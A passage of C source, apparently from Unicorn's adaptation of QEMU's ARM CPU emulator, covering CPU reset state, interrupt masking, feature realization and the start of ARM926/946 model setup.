see the bit). */ env->v7m.aircr = R_V7M_AIRCR_BFHFNMINS_MASK; /* * Set NSACR to indicate "NS access permitted to everything"; * this avoids having to have all the tests of it being * conditional on ARM_FEATURE_M_SECURITY. Note also that from * v8.1M the guest-visible value of NSACR in a CPU without the * Security Extension is 0xcff. */ env->v7m.nsacr = 0xcff; } /* In v7M the reset value of this bit is IMPDEF, but ARM recommends * that it resets to 1, so QEMU always does that rather than making * it dependent on CPU model. In v8M it is RES1. 
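     * (The bit in question is CCR.STKALIGN, which forces 8-byte stack
     * alignment on exception entry.)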
*/ env->v7m.ccr[M_REG_NS] = R_V7M_CCR_STKALIGN_MASK; env->v7m.ccr[M_REG_S] = R_V7M_CCR_STKALIGN_MASK; if (arm_feature(env, ARM_FEATURE_V8)) { /* in v8M the NONBASETHRDENA bit [0] is RES1 */ env->v7m.ccr[M_REG_NS] |= R_V7M_CCR_NONBASETHRDENA_MASK; env->v7m.ccr[M_REG_S] |= R_V7M_CCR_NONBASETHRDENA_MASK; } if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.ccr[M_REG_NS] |= R_V7M_CCR_UNALIGN_TRP_MASK; env->v7m.ccr[M_REG_S] |= R_V7M_CCR_UNALIGN_TRP_MASK; } if (cpu_isar_feature(aa32_vfp_simd, cpu)) { env->v7m.fpccr[M_REG_NS] = R_V7M_FPCCR_ASPEN_MASK; env->v7m.fpccr[M_REG_S] = R_V7M_FPCCR_ASPEN_MASK | R_V7M_FPCCR_LSPEN_MASK | R_V7M_FPCCR_S_MASK; } /* Unlike A/R profile, M profile defines the reset LR value */ env->regs[14] = 0xffffffff; env->v7m.vecbase[M_REG_S] = cpu->init_svtor & 0xffffff80; /* Load the initial SP and PC from offset 0 and 4 in the vector table */ vecbase = env->v7m.vecbase[env->v7m.secure]; #if 0 rom = rom_ptr(vecbase, 8); if (rom) { /* Address zero is covered by ROM which hasn't yet been * copied into physical memory. */ initial_msp = ldl_p(rom); initial_pc = ldl_p(rom + 4); } else #endif { /* Address zero not covered by a ROM blob, or the ROM blob * is in non-modifiable memory and this is a second reset after * it got copied into memory. In the latter case, rom_ptr * will return a NULL pointer and we should use ldl_phys instead. */ #ifdef UNICORN_ARCH_POSTFIX initial_msp = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(s->uc, s->as, vecbase); initial_pc = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(s->uc, s->as, vecbase + 4); #else initial_msp = ldl_phys(s->uc, s->as, vecbase); initial_pc = ldl_phys(s->uc, s->as, vecbase + 4); #endif } env->regs[13] = initial_msp & 0xFFFFFFFC; env->regs[15] = initial_pc & ~1; env->thumb = initial_pc & 1; } /* AArch32 has a hard highvec setting of 0xFFFF0000. If we are currently * executing as AArch32 then check if highvecs are enabled and * adjust the PC accordingly. */ if (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_V) { env->regs[15] = 0xFFFF0000; } /* M profile requires that reset clears the exclusive monitor; * A profile does not, but clearing it makes more sense than having it * set with an exclusive access on address zero. 
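     * (Clearing here just marks the monitor address invalid so a later
     * STREX/STXR cannot spuriously succeed.)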
*/ arm_clear_exclusive(env); env->vfp.xregs[ARM_VFP_FPEXC] = 0; if (arm_feature(env, ARM_FEATURE_PMSA)) { if (cpu->pmsav7_dregion > 0) { if (arm_feature(env, ARM_FEATURE_V8)) { memset(env->pmsav8.rbar[M_REG_NS], 0, sizeof(*env->pmsav8.rbar[M_REG_NS]) * cpu->pmsav7_dregion); memset(env->pmsav8.rlar[M_REG_NS], 0, sizeof(*env->pmsav8.rlar[M_REG_NS]) * cpu->pmsav7_dregion); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { memset(env->pmsav8.rbar[M_REG_S], 0, sizeof(*env->pmsav8.rbar[M_REG_S]) * cpu->pmsav7_dregion); memset(env->pmsav8.rlar[M_REG_S], 0, sizeof(*env->pmsav8.rlar[M_REG_S]) * cpu->pmsav7_dregion); } } else if (arm_feature(env, ARM_FEATURE_V7)) { memset(env->pmsav7.drbar, 0, sizeof(*env->pmsav7.drbar) * cpu->pmsav7_dregion); memset(env->pmsav7.drsr, 0, sizeof(*env->pmsav7.drsr) * cpu->pmsav7_dregion); memset(env->pmsav7.dracr, 0, sizeof(*env->pmsav7.dracr) * cpu->pmsav7_dregion); } } env->pmsav7.rnr[M_REG_NS] = 0; env->pmsav7.rnr[M_REG_S] = 0; env->pmsav8.mair0[M_REG_NS] = 0; env->pmsav8.mair0[M_REG_S] = 0; env->pmsav8.mair1[M_REG_NS] = 0; env->pmsav8.mair1[M_REG_S] = 0; } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { if (cpu->sau_sregion > 0) { memset(env->sau.rbar, 0, sizeof(*env->sau.rbar) * cpu->sau_sregion); memset(env->sau.rlar, 0, sizeof(*env->sau.rlar) * cpu->sau_sregion); } env->sau.rnr = 0; /* SAU_CTRL reset value is IMPDEF; we choose 0, which is what * the Cortex-M33 does. */ env->sau.ctrl = 0; } set_flush_to_zero(1, &env->vfp.standard_fp_status); set_flush_inputs_to_zero(1, &env->vfp.standard_fp_status); set_default_nan_mode(1, &env->vfp.standard_fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.standard_fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.fp_status_f16); hw_breakpoint_update_all(cpu); hw_watchpoint_update_all(cpu); arm_rebuild_hflags(env); } static inline bool arm_excp_unmasked(CPUState *cs, unsigned int excp_idx, unsigned int target_el, unsigned int cur_el, bool secure, uint64_t hcr_el2) { CPUARMState *env = cs->env_ptr; bool pstate_unmasked; bool unmasked = false; /* * Don't take exceptions if they target a lower EL. * This check should catch any exceptions that would not be taken * but left pending. */ if (cur_el > target_el) { return false; } switch (excp_idx) { case EXCP_FIQ: pstate_unmasked = !(env->daif & PSTATE_F); break; case EXCP_IRQ: pstate_unmasked = !(env->daif & PSTATE_I); break; case EXCP_VFIQ: if (secure || !(hcr_el2 & HCR_FMO) || (hcr_el2 & HCR_TGE)) { /* VFIQs are only taken when hypervized and non-secure. */ return false; } return !(env->daif & PSTATE_F); case EXCP_VIRQ: if (secure || !(hcr_el2 & HCR_IMO) || (hcr_el2 & HCR_TGE)) { /* VIRQs are only taken when hypervized and non-secure. */ return false; } return !(env->daif & PSTATE_I); default: g_assert_not_reached(); } /* * Use the target EL, current execution state and SCR/HCR settings to * determine whether the corresponding CPSR bit is used to mask the * interrupt. */ if ((target_el > cur_el) && (target_el != 1)) { /* Exceptions targeting a higher EL may not be maskable */ if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* * 64-bit masking rules are simple: exceptions to EL3 * can't be masked, and exceptions to EL2 can only be * masked from Secure state. The HCR and SCR settings * don't affect the masking logic, only the interrupt routing. 
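         * Concretely: an exception routed to EL3 is never masked, and one
         * routed to EL2 can only be masked while we are in Secure state.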
*/ if (target_el == 3 || !secure) { unmasked = true; } } else { /* * The old 32-bit-only environment has a more complicated * masking setup. HCR and SCR bits not only affect interrupt * routing but also change the behaviour of masking. */ bool hcr, scr; switch (excp_idx) { case EXCP_FIQ: /* * If FIQs are routed to EL3 or EL2 then there are cases where * we override the CPSR.F in determining if the exception is * masked or not. If neither of these are set then we fall back * to the CPSR.F setting otherwise we further assess the state * below. */ hcr = hcr_el2 & HCR_FMO; scr = (env->cp15.scr_el3 & SCR_FIQ); /* * When EL3 is 32-bit, the SCR.FW bit controls whether the * CPSR.F bit masks FIQ interrupts when taken in non-secure * state. If SCR.FW is set then FIQs can be masked by CPSR.F * when non-secure but only when FIQs are only routed to EL3. */ scr = scr && !((env->cp15.scr_el3 & SCR_FW) && !hcr); break; case EXCP_IRQ: /* * When EL3 execution state is 32-bit, if HCR.IMO is set then * we may override the CPSR.I masking when in non-secure state. * The SCR.IRQ setting has already been taken into consideration * when setting the target EL, so it does not have a further * affect here. */ hcr = hcr_el2 & HCR_IMO; scr = false; break; default: g_assert_not_reached(); } if ((scr || hcr) && !secure) { unmasked = true; } } } /* * The PSTATE bits only mask the interrupt if we have not overriden the * ability above. */ return unmasked || pstate_unmasked; } bool arm_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { CPUClass *cc = CPU_GET_CLASS(cs); CPUARMState *env = cs->env_ptr; uint32_t cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr_el2 = arm_hcr_el2_eff(env); uint32_t target_el; uint32_t excp_idx; /* The prioritization of interrupts is IMPLEMENTATION DEFINED. */ if (interrupt_request & CPU_INTERRUPT_FIQ) { excp_idx = EXCP_FIQ; target_el = arm_phys_excp_target_el(cs, excp_idx, cur_el, secure); if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_HARD) { excp_idx = EXCP_IRQ; target_el = arm_phys_excp_target_el(cs, excp_idx, cur_el, secure); if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_VIRQ) { excp_idx = EXCP_VIRQ; target_el = 1; if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_VFIQ) { excp_idx = EXCP_VFIQ; target_el = 1; if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } return false; found: cs->exception_index = excp_idx; env->exception.target_el = target_el; cc->do_interrupt(cs); return true; } #if !defined(TARGET_AARCH64) static bool arm_v7m_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { CPUClass *cc = CPU_GET_CLASS(cs); // ARMCPU *cpu = ARM_CPU(cs); // CPUARMState *env = &cpu->env; bool ret = false; /* ARMv7-M interrupt masking works differently than -A or -R. * There is no FIQ/IRQ distinction. Instead of I and F bits * masking FIQ and IRQ interrupts, an exception is taken only * if it is higher priority than the current execution priority * (which depends on state like BASEPRI, FAULTMASK and the * currently active exception). 
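     * Unicorn has no NVIC model, so the priority comparison is stubbed
     * out below and any pending CPU_INTERRUPT_HARD is taken directly.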
*/ if (interrupt_request & CPU_INTERRUPT_HARD) { // && (armv7m_nvic_can_take_pending_exception(env->nvic))) { cs->exception_index = EXCP_IRQ; cc->do_interrupt(cs); ret = true; } return ret; } #endif void arm_cpu_update_virq(ARMCPU *cpu) { /* * Update the interrupt level for VIRQ, which is the logical OR of * the HCR_EL2.VI bit and the input line level from the GIC. */ CPUARMState *env = &cpu->env; CPUState *cs = CPU(cpu); bool new_state = (env->cp15.hcr_el2 & HCR_VI) || (env->irq_line_state & CPU_INTERRUPT_VIRQ); if (new_state != ((cs->interrupt_request & CPU_INTERRUPT_VIRQ) != 0)) { if (new_state) { cpu_interrupt(cs, CPU_INTERRUPT_VIRQ); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_VIRQ); } } } void arm_cpu_update_vfiq(ARMCPU *cpu) { /* * Update the interrupt level for VFIQ, which is the logical OR of * the HCR_EL2.VF bit and the input line level from the GIC. */ CPUARMState *env = &cpu->env; CPUState *cs = CPU(cpu); bool new_state = (env->cp15.hcr_el2 & HCR_VF) || (env->irq_line_state & CPU_INTERRUPT_VFIQ); if (new_state != ((cs->interrupt_request & CPU_INTERRUPT_VFIQ) != 0)) { if (new_state) { cpu_interrupt(cs, CPU_INTERRUPT_VFIQ); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_VFIQ); } } } static inline void set_feature(CPUARMState *env, int feature) { env->features |= 1ULL << feature; } static inline void unset_feature(CPUARMState *env, int feature) { env->features &= ~(1ULL << feature); } static uint64_t arm_cpu_mp_affinity(int idx, uint8_t clustersz) { uint32_t Aff1 = idx / clustersz; uint32_t Aff0 = idx % clustersz; return (Aff1 << ARM_AFF1_SHIFT) | Aff0; } static void cpreg_hashtable_data_destroy(gpointer data) { /* * Destroy function for cpu->cp_regs hashtable data entries. * We must free the name string because it was g_strdup()ed in * add_cpreg_to_hashtable(). It's OK to cast away the 'const' * from r->name because we know we definitely allocated it. */ ARMCPRegInfo *r = data; g_free((void *)r->name); g_free(r); } void arm_cpu_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); CPUARMState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); cpu->cp_regs = g_hash_table_new_full(g_int_hash, g_int_equal, g_free, cpreg_hashtable_data_destroy); QLIST_INIT(&cpu->pre_el_change_hooks); QLIST_INIT(&cpu->el_change_hooks); /* DTB consumers generally don't in fact care what the 'compatible' * string is, so always provide some string and trust that a hypothetical * picky DTB consumer will also provide a helpful error message. */ cpu->psci_version = 1; /* By default assume PSCI v0.1 */ cpu->psci_version = 2; /* TCG implements PSCI 0.2 */ } unsigned int gt_cntfrq_period_ns(ARMCPU *cpu) { /* * The exact approach to calculating guest ticks is: * * muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), cpu->gt_cntfrq_hz, * NANOSECONDS_PER_SECOND); * * We don't do that. Rather we intentionally use integer division * truncation below and in the caller for the conversion of host monotonic * time to guest ticks to provide the exact inverse for the semantics of * the QEMUTimer scale factor. QEMUTimer's scale facter is an integer, so * it loses precision when representing frequencies where * `(NANOSECONDS_PER_SECOND % cpu->gt_cntfrq) > 0` holds. Failing to * provide an exact inverse leads to scheduling timers with negative * periods, which in turn leads to sticky behaviour in the guest. * * Finally, CNTFRQ is effectively capped at 1GHz to ensure our scale factor * cannot become zero. */ return NANOSECONDS_PER_SECOND > cpu->gt_cntfrq_hz ? 
NANOSECONDS_PER_SECOND / cpu->gt_cntfrq_hz : 1; } void arm_cpu_post_init(CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); /* M profile implies PMSA. We have to do this here rather than * in realize with the other feature-implication checks because * we look at the PMSA bit to see if we should add some properties. */ if (arm_feature(&cpu->env, ARM_FEATURE_M)) { set_feature(&cpu->env, ARM_FEATURE_PMSA); } if (arm_feature(&cpu->env, ARM_FEATURE_CBAR) || arm_feature(&cpu->env, ARM_FEATURE_CBAR_RO)) { cpu->reset_cbar = 0; } if (!arm_feature(&cpu->env, ARM_FEATURE_M)) { cpu->reset_hivecs = false; } if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { cpu->rvbar = 0; } if (arm_feature(&cpu->env, ARM_FEATURE_EL3)) { /* Add the has_el3 state CPU property only if EL3 is allowed. This will * prevent "has_el3" from existing on CPUs which cannot support EL3. */ cpu->has_el3 = true; } if (arm_feature(&cpu->env, ARM_FEATURE_EL2)) { cpu->has_el2 = true; } if (arm_feature(&cpu->env, ARM_FEATURE_PMU)) { cpu->has_pmu = true; } /* * Allow user to turn off VFP and Neon support, but only for TCG -- * KVM does not currently allow us to lie to the guest about its * ID/feature registers, so the guest always sees what the host has. */ if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64) ? cpu_isar_feature(aa64_fp_simd, cpu) : cpu_isar_feature(aa32_vfp, cpu)) { cpu->has_vfp = true; } if (arm_feature(&cpu->env, ARM_FEATURE_NEON)) { cpu->has_neon = true; } if (arm_feature(&cpu->env, ARM_FEATURE_M) && arm_feature(&cpu->env, ARM_FEATURE_THUMB_DSP)) { cpu->has_dsp = true; } if (arm_feature(&cpu->env, ARM_FEATURE_PMSA)) { cpu->has_mpu = true; } cpu->cfgend = false; if (arm_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER)) { cpu->gt_cntfrq_hz = NANOSECONDS_PER_SECOND / GTIMER_SCALE; } } static void arm_cpu_finalize_features(ARMCPU *cpu) { #if 0 if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { arm_cpu_sve_finalize(cpu); } #endif } void arm_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); ARMCPU *cpu = ARM_CPU(dev); CPUARMState *env = &cpu->env; #ifndef NDEBUG bool no_aa32 = false; #endif #if 0 /* The NVIC and M-profile CPU are two halves of a single piece of * hardware; trying to use one without the other is a command line * error and will result in segfaults if not caught here. */ if (arm_feature(env, ARM_FEATURE_M)) { if (!env->nvic) { return; } } else { if (env->nvic) { return; } } if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { if (!cpu->gt_cntfrq_hz) { return; } } #endif cpu_exec_realizefn(cs); arm_cpu_finalize_features(cpu); if (arm_feature(env, ARM_FEATURE_AARCH64) && cpu->has_vfp != cpu->has_neon) { /* * This is an architectural requirement for AArch64; AArch32 is * more flexible and permits VFP-no-Neon and Neon-no-VFP. 
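     * (Architecturally, AArch64 requires FP and AdvSIMD to be implemented
     * together; only AArch32 may provide one without the other.)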
*/ // error_setg(errp, "AArch64 CPUs must have both VFP and Neon or neither"); return; } if (!cpu->has_vfp) { uint64_t t; uint32_t u; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, JSCVT, 0, t); cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, FP, 0xf, t); cpu->isar.id_aa64pfr0 = t; u = cpu->isar.id_isar6; FIELD_DP32(u, ID_ISAR6, JSCVT, 0, u); cpu->isar.id_isar6 = u; u = cpu->isar.mvfr0; FIELD_DP32(u, MVFR0, FPSP, 0, u); FIELD_DP32(u, MVFR0, FPDP, 0, u); FIELD_DP32(u, MVFR0, FPTRAP, 0, u); FIELD_DP32(u, MVFR0, FPDIVIDE, 0, u); FIELD_DP32(u, MVFR0, FPSQRT, 0, u); FIELD_DP32(u, MVFR0, FPSHVEC, 0, u); FIELD_DP32(u, MVFR0, FPROUND, 0, u); cpu->isar.mvfr0 = u; u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, FPFTZ, 0, u); FIELD_DP32(u, MVFR1, FPDNAN, 0, u); FIELD_DP32(u, MVFR1, FPHP, 0, u); cpu->isar.mvfr1 = u; u = cpu->isar.mvfr2; FIELD_DP32(u, MVFR2, FPMISC, 0, u); cpu->isar.mvfr2 = u; } if (!cpu->has_neon) { uint64_t t; uint32_t u; unset_feature(env, ARM_FEATURE_NEON); t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, DP, 0, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, FCMA, 0, t); cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, ADVSIMD, 0xf, t); cpu->isar.id_aa64pfr0 = t; u = cpu->isar.id_isar5; FIELD_DP32(u, ID_ISAR5, RDM, 0, u); FIELD_DP32(u, ID_ISAR5, VCMA, 0, u); cpu->isar.id_isar5 = u; u = cpu->isar.id_isar6; FIELD_DP32(u, ID_ISAR6, DP, 0, u); FIELD_DP32(u, ID_ISAR6, FHM, 0, u); cpu->isar.id_isar6 = u; u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, SIMDLS, 0, u); FIELD_DP32(u, MVFR1, SIMDINT, 0, u); FIELD_DP32(u, MVFR1, SIMDSP, 0, u); FIELD_DP32(u, MVFR1, SIMDHP, 0, u); cpu->isar.mvfr1 = u; u = cpu->isar.mvfr2; FIELD_DP32(u, MVFR2, SIMDMISC, 0, u); cpu->isar.mvfr2 = u; } if (!cpu->has_neon && !cpu->has_vfp) { uint64_t t; uint32_t u; t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, FHM, 0, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, FRINTTS, 0, t); cpu->isar.id_aa64isar1 = t; u = cpu->isar.mvfr0; FIELD_DP32(u, MVFR0, SIMDREG, 0, u); cpu->isar.mvfr0 = u; /* Despite the name, this field covers both VFP and Neon */ u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, SIMDFMAC, 0, u); cpu->isar.mvfr1 = u; } if (arm_feature(env, ARM_FEATURE_M) && !cpu->has_dsp) { uint32_t u; unset_feature(env, ARM_FEATURE_THUMB_DSP); u = cpu->isar.id_isar1; FIELD_DP32(u, ID_ISAR1, EXTEND, 1, u); cpu->isar.id_isar1 = u; u = cpu->isar.id_isar2; FIELD_DP32(u, ID_ISAR2, MULTU, 1, u); FIELD_DP32(u, ID_ISAR2, MULTS, 1, u); cpu->isar.id_isar2 = u; u = cpu->isar.id_isar3; FIELD_DP32(u, ID_ISAR3, SIMD, 1, u); FIELD_DP32(u, ID_ISAR3, SATURATE, 0, u); cpu->isar.id_isar3 = u; } /* Some features automatically imply others: */ if (arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_V7); } else { set_feature(env, ARM_FEATURE_V7VE); } } /* * There exist AArch64 cpus without AArch32 support. When KVM * queries ID_ISAR0_EL1 on such a host, the value is UNKNOWN. * Similarly, we cannot check ID_AA64PFR0 without AArch64 support. * As a general principle, we also do not make ID register * consistency checks anywhere unless using TCG, because only * for TCG would a consistency-check failure be a QEMU bug. 
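 * Unicorn always runs on TCG, so the NDEBUG-guarded assertions that
 * follow are meaningful whenever they are compiled in.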
*/ if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { #ifndef NDEBUG no_aa32 = !cpu_isar_feature(aa64_aa32, cpu); #else cpu_isar_feature(aa64_aa32, cpu); #endif } if (arm_feature(env, ARM_FEATURE_V7VE)) { /* v7 Virtualization Extensions. In real hardware this implies * EL2 and also the presence of the Security Extensions. * For QEMU, for backwards-compatibility we implement some * CPUs or CPU configs which have no actual EL2 or EL3 but do * include the various other features that V7VE implies. * Presence of EL2 itself is ARM_FEATURE_EL2, and of the * Security Extensions is ARM_FEATURE_EL3. */ #ifndef NDEBUG assert(no_aa32 || cpu_isar_feature(aa32_arm_div, cpu)); #endif set_feature(env, ARM_FEATURE_LPAE); set_feature(env, ARM_FEATURE_V7); } if (arm_feature(env, ARM_FEATURE_V7)) { set_feature(env, ARM_FEATURE_VAPA); set_feature(env, ARM_FEATURE_THUMB2); set_feature(env, ARM_FEATURE_MPIDR); if (!arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_V6K); } else { set_feature(env, ARM_FEATURE_V6); } /* Always define VBAR for V7 CPUs even if it doesn't exist in * non-EL3 configs. This is needed by some legacy boards. */ set_feature(env, ARM_FEATURE_VBAR); } if (arm_feature(env, ARM_FEATURE_V6K)) { set_feature(env, ARM_FEATURE_V6); set_feature(env, ARM_FEATURE_MVFR); } if (arm_feature(env, ARM_FEATURE_V6)) { set_feature(env, ARM_FEATURE_V5); if (!arm_feature(env, ARM_FEATURE_M)) { #ifndef NDEBUG assert(no_aa32 || cpu_isar_feature(aa32_jazelle, cpu)); #endif set_feature(env, ARM_FEATURE_AUXCR); } } if (arm_feature(env, ARM_FEATURE_V5)) { set_feature(env, ARM_FEATURE_V4T); } if (arm_feature(env, ARM_FEATURE_LPAE)) { set_feature(env, ARM_FEATURE_V7MP); set_feature(env, ARM_FEATURE_PXN); } if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { set_feature(env, ARM_FEATURE_CBAR); } if (arm_feature(env, ARM_FEATURE_THUMB2) && !arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_THUMB_DSP); } /* * We rely on no XScale CPU having VFP so we can use the same bits in the * TB flags field for VECSTRIDE and XSCALE_CPAR. */ assert(arm_feature(&cpu->env, ARM_FEATURE_AARCH64) || !cpu_isar_feature(aa32_vfp_simd, cpu) || !arm_feature(env, ARM_FEATURE_XSCALE)); #if 0 if (arm_feature(env, ARM_FEATURE_V7) && !arm_feature(env, ARM_FEATURE_M) && !arm_feature(env, ARM_FEATURE_PMSA)) { /* v7VMSA drops support for the old ARMv5 tiny pages, so we * can use 4K pages. */ pagebits = 12; } else { /* For CPUs which might have tiny 1K pages, or which have an * MPU and might have small region sizes, stick with 1K pages. */ pagebits = 10; } if (!set_preferred_target_page_bits(cpu->uc, pagebits)) { /* This can only ever happen for hotplugging a CPU, or if * the board code incorrectly creates a CPU which it has * promised via minimum_page_size that it will not. */ // error_setg(errp, "This CPU requires a smaller page size than the " // "system is using"); return; } #endif /* This cpu-id-to-MPIDR affinity is used only for TCG; KVM will override it. * We don't support setting cluster ID ([16..23]) (known as Aff2 * in later ARM ARM versions), or any of the higher affinity level fields, * so these bits always RAZ. 
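 * With the default ARM_DEFAULT_CPUS_PER_CLUSTER of 8, cpu_index N is
 * mapped to Aff1 = N / 8 and Aff0 = N % 8.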
*/ if (cpu->mp_affinity == ARM64_AFFINITY_INVALID) { cpu->mp_affinity = arm_cpu_mp_affinity(cs->cpu_index, ARM_DEFAULT_CPUS_PER_CLUSTER); } if (cpu->reset_hivecs) { cpu->reset_sctlr |= (1 << 13); } if (cpu->cfgend) { if (arm_feature(&cpu->env, ARM_FEATURE_V7)) { cpu->reset_sctlr |= SCTLR_EE; } else { cpu->reset_sctlr |= SCTLR_B; } } if (!cpu->has_el3) { /* If the has_el3 CPU property is disabled then we need to disable the * feature. */ unset_feature(env, ARM_FEATURE_EL3); /* Disable the security extension feature bits in the processor feature * registers as well. These are id_pfr1[7:4] and id_aa64pfr0[15:12]. */ cpu->id_pfr1 &= ~0xf0; cpu->isar.id_aa64pfr0 &= ~0xf000; } if (!cpu->has_el2) { unset_feature(env, ARM_FEATURE_EL2); } if (!cpu->has_pmu) { unset_feature(env, ARM_FEATURE_PMU); } if (arm_feature(env, ARM_FEATURE_PMU)) { pmu_init(cpu); arm_register_pre_el_change_hook(cpu, &pmu_pre_el_change, 0); arm_register_el_change_hook(cpu, &pmu_post_el_change, 0); } else { FIELD_DP64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, PMUVER, 0, cpu->isar.id_aa64dfr0); FIELD_DP32(cpu->isar.id_dfr0, ID_DFR0, PERFMON, 0, cpu->isar.id_dfr0); cpu->pmceid0 = 0; cpu->pmceid1 = 0; } if (!arm_feature(env, ARM_FEATURE_EL2)) { /* Disable the hypervisor feature bits in the processor feature * registers if we don't have EL2. These are id_pfr1[15:12] and * id_aa64pfr0_el1[11:8]. */ cpu->isar.id_aa64pfr0 &= ~0xf00; cpu->id_pfr1 &= ~0xf000; } /* MPU can be configured out of a PMSA CPU either by setting has-mpu * to false or by setting pmsav7-dregion to 0. */ if (!cpu->has_mpu) { cpu->pmsav7_dregion = 0; } if (cpu->pmsav7_dregion == 0) { cpu->has_mpu = false; } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { uint32_t nr = cpu->pmsav7_dregion; if (nr > 0xff) { // error_setg(errp, "PMSAv7 MPU #regions invalid %" PRIu32, nr); return; } if (nr) { if (arm_feature(env, ARM_FEATURE_V8)) { /* PMSAv8 */ env->pmsav8.rbar[M_REG_NS] = g_new0(uint32_t, nr); env->pmsav8.rlar[M_REG_NS] = g_new0(uint32_t, nr); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { env->pmsav8.rbar[M_REG_S] = g_new0(uint32_t, nr); env->pmsav8.rlar[M_REG_S] = g_new0(uint32_t, nr); } } else { env->pmsav7.drbar = g_new0(uint32_t, nr); env->pmsav7.drsr = g_new0(uint32_t, nr); env->pmsav7.dracr = g_new0(uint32_t, nr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { uint32_t nr = cpu->sau_sregion; if (nr > 0xff) { // error_setg(errp, "v8M SAU #regions invalid %" PRIu32, nr); return; } if (nr) { env->sau.rbar = g_new0(uint32_t, nr); env->sau.rlar = g_new0(uint32_t, nr); } } if (arm_feature(env, ARM_FEATURE_EL3)) { set_feature(env, ARM_FEATURE_VBAR); } register_cp_regs_for_features(cpu); unsigned int smp_cpus = 1; if (cpu->has_el3 || arm_feature(env, ARM_FEATURE_M_SECURITY)) { cs->num_ases = 2; if (!cpu->secure_memory) { cpu->secure_memory = cs->memory; } cpu_address_space_init(cs, ARMASIdx_S, cpu->secure_memory); } else { cs->num_ases = 1; } cpu_address_space_init(cs, ARMASIdx_NS, cs->memory); /* No core_count specified, default to smp_cpus. */ if (cpu->core_count == -1) { cpu->core_count = smp_cpus; } cpu_reset(cs); } /* CPU models. These are not needed for the AArch64 linux-user build. 
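 * When TARGET_AARCH64 is defined these 32-bit models are compiled out;
 * the 64-bit models are defined separately (cpu64.c in upstream QEMU).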
*/ #if !defined(TARGET_AARCH64) static void arm926_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); cpu->midr = 0x41069265; cpu->reset_fpsid = 0x41011090; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00090078; /* * ARMv5 does not have the ID_ISAR registers, but we can still * set the field to indicate Jazelle support within QEMU. */ FIELD_DP32(cpu->isar.id_isar1, ID_ISAR1, JAZELLE, 1, cpu->isar.id_isar1); /* * Similarly, we need to set MVFR0 fields to enable vfp and short vector * support even though ARMv5 doesn't have this register. */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSP, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPDP, 1, cpu->isar.mvfr0); } static void arm946_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_PMSA); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x41059461; cpu->ctr = 